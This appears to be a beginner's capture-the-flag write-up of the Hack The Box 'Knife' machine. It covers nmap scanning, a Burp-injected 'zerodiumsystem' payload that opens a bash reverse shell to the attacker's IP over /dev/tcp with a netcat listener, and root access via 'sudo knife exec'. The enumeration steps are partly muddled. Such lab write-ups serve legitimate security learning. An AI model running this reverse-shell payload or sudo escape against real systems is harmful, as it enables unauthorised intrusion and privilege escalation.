After starting openvpn connection, check the web portal for the ip-address provided by HTB on browser.
So, let's start with nmap scan, to this command is like:
sudo nmap -vv -A -O -p0-1024 -sV -oA knife 10.10.10.242
From this scan we found 1 ports open i.e. port 22
So, form now on we would try to enumerate ssh service on port 22 for ip 10.10.10.242
First lets check if this ssh service has default login, for that try
1) ssh anonymous@10.10.10.242 (This would directly try to login using user:Anonymous, pass the password blank)
OR
2) enum4linux -A 10.10.10.242
So this refers that this ssh service does not have default login system.
Now lets try on web portal, using burp suite to track the packets sent and received, make the intercept on and now refresh and check the request we made in burp suite.
Here we can add a reverse shell to connect directly with web server. For that the steps would be like,
Firstly we have to sent the request to Burp Repeater and then we have to check our openvpn ipaddress using ifconfig command,
Use this ip-address for reversing the shell as shown in below mentioned command we have to enter in burp suite. But before start a listener on the port which you want to connect on with web server.
using command: nc -nvlp 4232
zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.202/4232 0>&1'");
After this request is sent, connection is made and we have logged in into the web server.
So now check the directories and find out the user flag from here.
Let's go to the root flag after user flag is discovered.
I started with checking through cd command like cd root, but showed permission error.
So after some googling i found that we can use same reverse shell methodology to enter into root's permission. So first lets check the username as
sudo -l
So we can now go on further step i.e. command sudo knife exec --exec "exec '/bin/bash -i '"
Now get your root flag too..HEHEHE
All thanks to google!!!
Please let me know if anything is written wrong, as a newbie I would love the feedback and try to change that.
0 Comments